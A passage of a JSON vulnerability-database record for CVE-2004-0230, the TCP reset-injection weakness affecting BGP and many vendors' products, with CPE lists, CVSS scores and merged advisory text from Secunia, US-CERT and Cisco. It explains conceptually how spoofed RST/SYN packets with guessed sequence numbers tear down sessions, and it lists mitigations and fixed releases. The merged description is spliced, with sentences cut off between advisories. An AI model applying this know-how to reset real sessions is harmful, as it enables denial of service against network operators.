                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:ip_tv",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:lightstream",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:localdirector",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:mds_9000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:me_1100",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:mgx_8220",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:mgx_8230",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:mgx_8250",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:mgx_8850",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:mgx_8950",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:microhub",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:microswitch",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:ons_15100",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:ons_15300",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:ons_15400",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:ons_15500",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:ons_15800_dwdm",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:ons_15830",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:ons_15831",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:ons_15832",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:pix_firewall",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:rtm",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:cisco:secure_access_control_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:secure_ids",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:cisco:secure_user_registration_tool",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:sn_5400",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:switchprobe",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:escon_channel_port_adapter",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:parallel_channel_port_adapter",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:traffic_director",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:unity",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:vg248",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:vg248_analog_phone_gateway",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:vpn_3000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:cisco:wan_manager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:cisco:ciscoworks_device_fault_manager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:cisco:ciscoworks_windows",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:hosting_solution_engine",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:cisco:ciscoworks_voice_manager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:cisco:wireless_lan_solution_engine",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:ws-x6608-e1",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:ws-x6608-t1",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:ws-x6624-fxs",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:symantec:nexland_isb_soho_firewall_appliance",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:symantec:nexland_pro_firewall_appliance",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:symantec:enterprise_firewall",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:symantec:firewall_vpn_appliance",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:symantec:gateway_security_300",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:symantec:gateway_security_400",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:symantec:gateway_security_5300",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:symantec:gateway_security_5400",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:symantec:symantec_velociraptor",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:juniper:screenos",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:checkpoint:provider-1",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:checkpoint:vpn-1_firewall-1",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:hp:advancestack_switch",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:hp:ethertwist_switch",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:hp:procurve_switch",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:hp:procurve_routing_switch",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:microsoft:windows_2000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:microsoft:windows-9x",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:microsoft:windows_server_2003",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:microsoft:windows_xp",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rt",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:nec:cx3200",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:nec:ix1000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:nec:ix2000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:nec:ix3000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:nec:ix5000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:nec:ix5500",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:nec:qx",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:nec:univerge_ip8800_s_r",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:hitachi:gr2000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:hitachi:gr4000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:hitachi:gs3000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:hitachi:gs4000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:hitachi:sanrise",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_application_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_security_director",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:safegate",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2004-000150"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Discovery is credited to Paul A. Watson.",
        "sources": [
          {
            "db": "BID",
            "id": "10183"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2004-0230",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2004-0230",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "VHN-8660",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2004-0230",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#415294",
                "trust": 0.8,
                "value": "12.90"
              },
              {
                "author": "NVD",
                "id": "CVE-2004-0230",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200408-159",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-8660",
                "trust": 0.1,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2004-0230",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#415294"
          },
          {
            "db": "VULHUB",
            "id": "VHN-8660"
          },
          {
            "db": "VULMON",
            "id": "CVE-2004-0230"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200408-159"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2004-000150"
          },
          {
            "db": "NVD",
            "id": "CVE-2004-0230"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "TCP, when using a large Window Size, makes it easier for remote attackers to guess sequence numbers and cause a denial of service (connection loss) to persistent TCP connections by repeatedly injecting a TCP RST packet, especially in protocols that use long-lived connections, such as BGP. A vulnerability exists in the reliance of the Border Gateway Protocol (BGP) on the Transmission Control Protocol (TCP) to maintain persistent sessions. Sustained exploitation of this vulnerability could lead to a denial-of-service condition affecting a large segment of the Internet community. Normal operations would most likely resume shortly after the attack stopped. TCP Has a sequence number TCP There is a problem that it is justified if it is within the window. Therefore, there is a vulnerability that makes it easy to guess the external sequence number when establishing a long-term connection that increases the window size. Note that products affected by this vulnerability TCP Covers many products with implementation. For more information, NISCC-236929 (JVN) , NISCC Advisory 236929 (CPNI Advisory 00391) Please check also.A third party TCP By predicting the sequence number of a particular TCP Service operation interruption such as forcibly terminating a connection (DoS) There is a possibility of being attacked. A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port. \nFew factors may present viable target implementations, such as imlementations that:\n- depend on long-lived TCP connections\n- have known or easily guessed IP address endpoints\n- have known or easily guessed TCP source ports. As a result, this issue is likely to affect a number of routing platforms. \nNote also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further. \nOther consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed. \n**Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. The following products and versions are affected: Oracle Solaris 10, 11; Openpgp 2.6.2; Mcafee Network Data Loss Prevention 8.6 and earlier, 9.2.0, 9.2.1, 9.2.2; Netbsd 1.5, Version 1.5.1, Version 1.5.2, Version 1.5.3, Version 1.6, Version 1.6.1, Version 1.6.2, Version 2.0; Xinuos Openserver Version 5.0.6, Version 5.0.7; Juniper Networks Junos OS; Xinuos Unixware Version 7.1.1, Version 7.1.3. \n\n----------------------------------------------------------------------\n\nWant a new IT Security job?\n\nVacant positions at Secunia:\nhttp://secunia.com/secunia_vacancies/\n\n----------------------------------------------------------------------\n\nTITLE:\nAvaya Intuity Audix TCP Connection Reset Vulnerability\n\nSECUNIA ADVISORY ID:\nSA15263\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/15263/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nDoS\n\nWHERE:\n\u003eFrom remote\n\nOPERATING SYSTEM:\nAvaya Intuity Audix R5\nhttp://secunia.com/product/4586/\n\nDESCRIPTION:\nAvaya has acknowledged a vulnerability in Intuity Audix, which can be\nexploited by malicious people to reset established TCP connections on\na vulnerable system. \n\nFor more information:\nSA11440\n\nSOLUTION:\nA patch will reportedly be included in the next major release. \n\nORIGINAL ADVISORY:\nAvaya:\nhttp://support.avaya.com/elmodocs2/security/ASA-2005-097_SCASA-2005-14.pdf\n\nOTHER REFERENCES:\nSA11440:\nhttp://secunia.com/advisories/11440/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. Routing operations would recover quickly\n   after such attacks ended. \n\nI. Description\n\n   In 2001, the CERT Coordination Center released CA-2001-09, describing\n   statistical weaknesses in various TCP/IP Initial Sequence generators. \n   In that document (\u003chttp://www.cert.org/advisories/CA-2001-09.html\u003e),\n   it was noted by Tim Newsham:\n\n     [I]f a sequence number within the receive window is known, an\n     attacker can inject data into the session stream or terminate the\n     connection. If the ISN value is known and the number of bytes sent\n     already sent is known, an attacker can send a simple packet to\n     inject data or kill the session. \n\n   Paul Watson has performed the statistical analysis of this attack\n   when the ISN is not known and has pointed out that such an attack\n   could be viable when specifically taking into account the TCP\n   Window size. He has also created a proof-of-concept tool\n   demonstrating the practicality of the attack. The National\n   Infrastructure Security Co-Ordination Centre (NISCC) has published\n   an advisory summarizing Paul Watson\u0027s analysis in \"NISCC\n   Vulnerability Advisory 236929,\" available at\n   \u003chttp://www.uniras.gov.uk/vuls/2004/236929/index.htm\u003e. \n\n   Since TCP is an insecure protocol, it is possible to inject\n   transport-layer packets into sessions between hosts given the right\n   preconditions. For detailed information about BGP and\n   some tips for securing it, please see Cisco System\u0027s documentation\n   (\u003chttp://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/bgp.htm\u003e\n   or Team Cymru (\u003chttp://www.cymru.com/\u003e). This may result in a brief\n   loss of service until the fresh routing tables are created. When\n   this is taken into account, instead of attempting to send a spoofed\n   packet with all potential sequence numbers, the attacker would only\n   need to calculate an valid sequence number that falls within the next\n   expected ISN plus or minus half the window size. According to Paul Watson\u0027s report,\n   with a typical xDSL data connection (80 Kbps, upstream) capable of\n   sending of 250 packets per second (pps) to a session with a TCP Window\n   size of 65,535 bytes, it would be possible to inject a TCP packet\n   approximately every 5 minutes. It would take approximately 15 seconds\n   with a T-1 (1.544 Mbps) connection. These numbers are significant when\n   large numbers of compromised machines (often called \"botnets\" or\n   \"zombies\") can be used to generate large amounts of packets that can\n   be directed at a particular host. \n\n   To protect against such injections, RFC 2385 provides a method of\n   using MD5 signatures on the TCP Headers. If this form of verification\n   is supported and enabled between two peers, then an attacker would\n   have to obtain the key used to transmit the packet in order to\n   successfully inject a packet into the TCP session. Another alternative\n   would be to tunnel BGP over IPSec. Again, this would provide a form of\n   authentication between the BGP peers and the data that they transmit. \n   The lack of authentication when using TCP for BGP makes this type of\n   attack more viable. \n\n   US-CERT is tracking this issue as VU#415294. This reference number\n   corresponds to CVE candidate CAN-2004-0230. NISCC is tracking this\n   issue as Advisory 236929. \n\nII. Impacts could range from data corruption or session\n   hijacking to a denial-of-service condition. \n\nIII. Solution\n\nApply a patch from your vendor\n\n   Please see you vendor\u0027s statement regarding the availability of\n   patches, updates and mitigation strategies. The lack of cryptographically-strong\n   security options for the TCP header itself is a deficiency that\n   technologies like IPSec try to address. It must be noted that in the\n   final analysis that if an attacker has the ability to see unencrypted\n   TCP traffic generated from a site, that site is vulnerable to various\n   TCP attacks - not just those mentioned here. A stronger measure that\n   would aid in protecting against such TCP attacks is end-to-end\n   cryptographic solutions like those outlined in various IPSec\n   documents. \n\n   The key idea with an end-to-end cryptographic solution is that there\n   is some secure verification that a given packet belongs in a\n   particular stream. However, the communications layer at which this\n   cryptography is implemented will determine its effectiveness in\n   repelling ISN based attacks. Solutions that operate above the\n   Transport Layer (OSI Layer 4), such as SSL/TLS and SSH1/SSH2, only\n   prevent arbitrary packets from being inserted into a session. They are\n   unable to prevent a connection reset (denial of service) since the\n   connection handling will be done by a lower level protocol (i.e.,\n   TCP). On the other hand, Network Layer (OSI Layer 3) cryptographic\n   solutions such as IPSec prevent both arbitrary packets entering a\n   transport-layer stream and connection resets because connection\n   management is directly integrated into the secure Network Layer\n   security model. \n\n   The solutions presented above have the desirable attribute of not\n   requiring any changes to the TCP protocol or implementations to be\n   made. RFC2385 (\"Protection of BGP Sessions via the TCP MD5\n   Signature Option\") and other technologies provide options for adding\n   cryptographic protection within the TCP header at the cost of some\n   potential denial of service, interoperability, and performance issues. \n\nIngress filtering\n\n   Ingress filtering manages the flow of traffic as it enters a network\n   under your administrative control. You can configure your BGP routers\n   to only accept packets on a specific network connection. Servers are\n   typically the only machines that need to accept inbound connections\n   from the public Internet. In the network usage policy of many sites,\n   there are few reasons for external hosts to initiate inbound\n   connections to machines that provide no public services. Thus, ingress\n   filtering should be performed at the border to prohibit externally\n   initiated inbound connections to non-authorized services. In this\n   fashion, the effectiveness of many intruder scanning techniques can be\n   dramatically reduced. \n\nNetwork Isolation\n\n   Complex networks can benefit by separating data channels and control\n   channels, such as BGP, into different logical or physical networks. \n   Technologies such as VLANs, VPNs, leased links, NAT may all be able to\n   contribute to separating the tranmission of control information from\n   the transmission of the data stream. \n\nEgress filtering\n\n   Egress filtering manages the flow of traffic as it leaves a network\n   under your administrative control. There is typically limited need for\n   machines providing public services to initiate outbound connections to\n   the Internet. \n\n   In the case of BGP, only your BGP routers should be establishing\n   connections to your peers. Other BGP traffic generated on your network\n   could be a sign of an attempted attack. \n\nAppendix A. As\n   vendors report new information to US-CERT, we will update the\n   vulnerability note. If a particular vendor is not listed in either the\n   NISCC advisory, or the vulnerability, we recommend that you contact\n   them for their comments. \n     _________________________________________________________________\n\n   US-CERT thanks Paul Watson, Cisco Systems and NISCC for notifying us\n   about this problem and for helping us to construct this advisory. \n     _________________________________________________________________\n\n   Feedback can be directed to the US-CERT Technical Staff. \n     _________________________________________________________________\n\n   Copyright 2004 Carnegie Mellon University. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nCisco Security Advisory:\\xa0TCP Vulnerabilities in Multiple IOS-Based Cisco\nProducts\n\nRevision 1.0\n\nFor Public Release 2004 April 20 21:00 UTC (GMT)\n\n- -------------------------------------------------------------------------\nSummary\n=======\nA vulnerability in the Transmission Control Protocol (TCP) specification\n(RFC793) has been discovered by an external researcher. The successful\nexploitation enables an adversary to reset any established TCP connection\nin a much shorter time than was previously discussed publicly. Depending\non the application, the connection may get automatically re-established. \nIn other cases, a user will have to repeat the action (for example, open\na new Telnet or SSH session). Depending upon the attacked protocol, a\nsuccessful attack may have additional consequences beyond terminated\nconnection which must be considered. This attack vector is only\napplicable to the sessions which are terminating on a device (such as a\nrouter, switch, or computer) and not to the sessions that are only\npassing through the device (for example, transit traffic that is being\nrouted by a router). In addition, this attack vector does not directly\ncompromise data integrity or confidentiality. \n\nThis advisory is available at \nhttp://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml, \nand it describes this vulnerability as it applies to Cisco products that \nrun Cisco IOS\\xae software. \n\nA companion advisory that describes this vulnerability for products that\ndo not run Cisco IOS software is available at \nhttp://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-nonios.shtml. The severity of the exposure\ndepends upon the protocols and applications that utilize TCP. \n\nThis attack vector is only applicable to the sessions which are\nterminating on a device (such as a router, switch, or computer), and not\nto the sessions that are only passing through the device (for example,\ntransit traffic that is being routed by a router). \n\nDetails\n=======\nTCP is the transport layer protocol designed to provide\nconnection-oriented reliable delivery of a data stream. To accomplish\nthis, TCP uses a mixture of flags to indicate state and sequence numbers\nto identify the order in which the packets are to be reassembled. The acknowledgement number is not used in a packet with the\nreset (RST) flag set because a reset does not expect a packet in return. \nThe full specification of the TCP protocol can be found at \nhttp://www.ietf.org/rfc/rfc0793.txt. \n\nAccording to the RFC793 specification, it is possible to reset an\nestablished TCP connection by sending a packet with the RST or\nsynchronize (SYN) flag set. However, the sequence number does not\nhave to be an exact match; it is sufficient to fall within the advertised\nwindow. This significantly decreases the effort required by an adversary:\nthe larger the window, the easier it is to reset the connection. The destination TCP port is usually\nknown for all standard services (for example, 23 for Telnet, 80 for\nHTTP). Cisco IOS software uses predictable ephemeral ports for known\nservices with a predictable increment (the next port which will be used\nfor a subsequent connection). These values, while constant for a\nparticular Cisco IOS software version and protocol, can vary from one\nrelease to another. \n\nHere is an example of a normal termination of a TCP session:\n   \n    \n                    Host(1)                       Host(2)\n                      |                             |\n                      |                             |\n                      |  ACK ack=1001, window=5000  |\n                      |\u003c----------------------------|\n                      |                             |\n    \n    \n    \n                  Host(1) is\n    \n             closing the session\n    \n    \n    \n                      |        RST seq=1001         |\n                      |----------------------------\u003e|\n                      |                             |\n    \n    \n    \n                                                Host(2) is\n    \n                                            closing the session\n    \n   \nIn addition, the following scenario is also permitted:\n   \n    \n                    Host(1)                       Host(2)\n                      |                             |\n                      |                             |\n                      |  ACK ack=1001, window=5000  |\n                      |\u003c----------------------------|\n                      |                             |\n    \n    \n    \n                  Host(1) is\n    \n             closing the session\n    \n    \n    \n                      |        RST seq=4321         |\n                      |----------------------------\u003e|\n                      |                             |\n    \n    \n    \n                                                Host(2) is\n    \n                                            closing the session\n    \n   \nNote how, in the second example, the RST packet was able to terminate the\nsession although the sequence number was not the next expected one (which\nis 1001). \n\nAs a general rule, all protocols where a TCP connection stays established\nfor longer than one minute should be considered exposed. \n\nThe exposure on this vulnerability can be described as follows:\n   \n   \n  * Cisco IOS - All devices running Cisco IOS software are vulnerable. Sessions passing through the device are vulnerable only if\n    the originating or receiving device is vulnerable, but they cannot be\n    attacked on the router itself. This vulnerability does not compromise\n    data integrity or confidentiality. It only affects availability. \n   \n    This vulnerability is documented in the Cisco Bug Toolkit as Bug IDs \n    CSCed27956 ( registered customers only) and CSCed38527 ( registered\n    customers only) . \n   \n   \n  * Cisco IOS Firewall (IOS FW) - The Cisco IOS FW monitors packets\n    passing throughout the router and maintains the session state\n    internally. This way, it is possible to \"open\" required ports and\n    allow traffic to pass and then close them after the session has\n    finished. Since Cisco IOS FW intercepts and examines all packets\n    passing through the device, all TCP sessions passing through the\n    Cisco IOS FW are vulnerable to this attack. This is valid even if the\n    originating and receiving devices themselves are not vulnerable. \n   \n    This vulnerability is documented in the Cisco Bug Toolkit as Bug ID \n    CSCed93836 ( registered customers only) . \n   \n   \n  * Network Address Translation (NAT) - This vulnerability does not have\n    any effect on NAT. The NAT functionality simply rewrites ports and IP\n    addresses. This feature does not interprete TCP flags and therefore\n    is not vulnerable to this attack. However, the attacking packet will\n    be passed through the router and the receiving device can be\n    affected. \n   \n\nImpact\n======\nThe impact will be different for each specific protocol. While in the\nmajority of cases a TCP connection will be automatically re-established,\nin some specific protocols a second order of consequences may have a\nlarger impact than tearing down the connection itself. Both external and internal (eBGP and iBGP) sessions\nare equally vulnerable. If an adversary tears down a BGP session between\ntwo routers, then all routes which were advertised between these two\npeers will be withdrawn. This would occur immediately for the router\nwhich has been attacked and after the next update/keepalive packet is\nsent by the other router. The BGP peering session itself will be\nre-established within a minute after the attack. Depending upon the exact\nrouting configuration, withdrawal of the routes may have any of the\nfollowing consequences:\n   \n   \n  * No adverse effects at all if an appropriate static route(s) has(have)\n    been defined on both sides of the affected session. \n   \n  * The traffic will be rerouted along other paths. This may cause some\n    congestion along these paths. \n   \n  * A portion of the network will be completely isolated and unreachable. \n   \n\nIf a BGP peering session is broken a few times within a short time\ninterval, then BGP route dampening may be invoked. Dampening means that\naffected routes will be withdrawn from the Internet routing table for\nsome period of time. By default that time is 45 minutes. During that\ntime, all of the traffic whose route was advertised over the attacked BGP\nsession will either be rerouted or a portion of the network will be\nunreachable. Route dampening is not enabled by default. \n\nCisco IOS Firewall Feature Set\n- ------------------------------\nIt is possible to terminate an established TCP-based connection even if\nboth endpoints are not vulnerable to this attack. \n\nSoftware Versions and Fixes\n===========================\nEach row of the table describes a release train and the platforms or\nproducts for which it is intended. If a given release train is\nvulnerable, then the earliest possible releases that contain the fix and\nthe anticipated date of availability for each are listed in the Rebuild,\nInterim, and Maintenance columns. In some cases, no rebuild of a\nparticular release is planned; this is marked with the label \"Not\nscheduled.\" A device running any release in the given train that is\nearlier than the release in a specific column (less than the earliest\nfixed release) is known to be vulnerable, and it should be upgraded at\nleast to the indicated release or a later version (greater than the\nearliest fixed release label). \n\nWhen selecting a release, keep in mind the following definitions:\n   \n   \n  * Maintenance\n    Most heavily tested and highly recommended release of any label in a\n    given row of the table. \n   \n   \n  * Rebuild\n    Constructed from the previous maintenance or major release in the\n    same train, it contains the fix for a specific vulnerability. \n    Although it receives less testing, it contains only the minimal\n    changes necessary to effect the repair. Cisco has made available\n    several rebuilds of mainline trains to address this vulnerability,\n    but strongly recommends running only the latest maintenance release\n    on mainline trains. \n   \n   \n  * Interim\n    Built at regular intervals between maintenance releases and receives\n    less testing. Interims should be selected only if there is no other\n    suitable release that addresses the vulnerability, and interim images\n    should be upgraded to the next available maintenance release as soon\n    as possible. Interim releases are not available through\n    manufacturing, and usually they are not available for customer\n    download from CCO without prior arrangement with the Cisco Technical\n    Assistance Center (TAC). \n   \n\nIn all cases, customers should exercise caution to be certain the devices\nto be upgraded contain sufficient memory and that current hardware and\nsoftware configurations will continue to be supported properly by the new\nrelease. If the information is not clear, contact the Cisco TAC for\nassistance, as shown in the section following this table. \n\nFixed Cisco IOS Software Images for Cisco IOS Firewall\n\n+------------+---------------------------------+\n|   Major    |    Availability of Repaired     |\n|  Release   |            Releases*            |\n+------------+---------+---------+-------------+\n| Affected   | Rebuild | Interim | Maintenance |\n| 12.1-Based |         | **      |             |\n| Release    |         |         |             |\n+------------+---------+---------+-------------+\n| 12.1       | 12.1    |         |             |\n|            | (22c)   |         |             |\n+------------+---------+---------+-------------+\n| 12.1E      | 12.1    |         |             |\n|            | (19)E7  |         |             |\n|            +---------+---------+-------------+\n|            |         |         |             |\n+------------+---------+---------+-------------+\n| Affected   | Rebuild | Interim | Maintenance |\n| 12.2-Based |         | **      |             |\n| Release    |         |         |             |\n+------------+---------+---------+-------------+\n| 12.2       | 12.2    |         |             |\n|            | (21b)   |         |             |\n|            +---------+---------+-------------+\n|            | 12.2    |         |             |\n|            | (23a)   |         |             |\n+------------+---------+---------+-------------+\n| 12.2T      | 12.2    |         |             |\n|            | (11)T11 |         |             |\n|            +---------+---------+-------------+\n|            | 12.2    |         |             |\n|            | (13)T12 |         |             |\n|            +---------+---------+-------------+\n|            | 12.2    |         |             |\n|            | (15)T12 |         |             |\n+------------+---------+---------+-------------+\n| Affected   | Rebuild | Interim | Maintenance |\n| 12.3-Based |         | **      |             |\n| Release    |         |         |             |\n+------------+---------+---------+-------------+\n| 12.3       | 12.3    |         |             |\n|            | (5c)    |         |             |\n|            +---------+---------+-------------+\n|            | 12.3    |         |             |\n|            | (6a)    |         |             |\n+------------+---------+---------+-------------+\n| 12.3T      | 12.3(4) |         |             |\n|            | T4      |         |             |\n+------------+---------+---------+-------------+\n\nFixed Cisco IOS Software Releases and Migration Path\n\n+----------+-------------------------------------+\n|  Major   | Availability of Repaired Releases*  |\n| Release  |                                     |\n+----------+-------------+---------+-------------+\n| Affected | Rebuild     | Interim | Maintenance |\n| 11.1     |             | **      |             |\n| -Based   |             |         |             |\n| Release  |             |         |             |\n+----------+-------------+---------+-------------+\n| 11.1     | 11.1 Vulnerable. Migrate to 11.2    |\n+----------+-------------------------------------+\n| 11.1AA   | 11.1AA Vulnerable. Migrate to 11.2P |\n+----------+-------------------------------------+\n| 11.1CC   | 11.1CC Vulnerable. Migrate to 12.0  |\n+----------+-------------+---------+-------------+\n| Affected | Rebuild     | Interim | Maintenance |\n| 11.2     |             | **      |             |\n| -Based   |             |         |             |\n| Release  |             |         |             |\n+----------+-------------+---------+-------------+\n| 11.2     | 11.2(26f)   |         |             |\n|          | Available   |         |             |\n|          | on          |         |             |\n|          | 2004-Apr-21 |    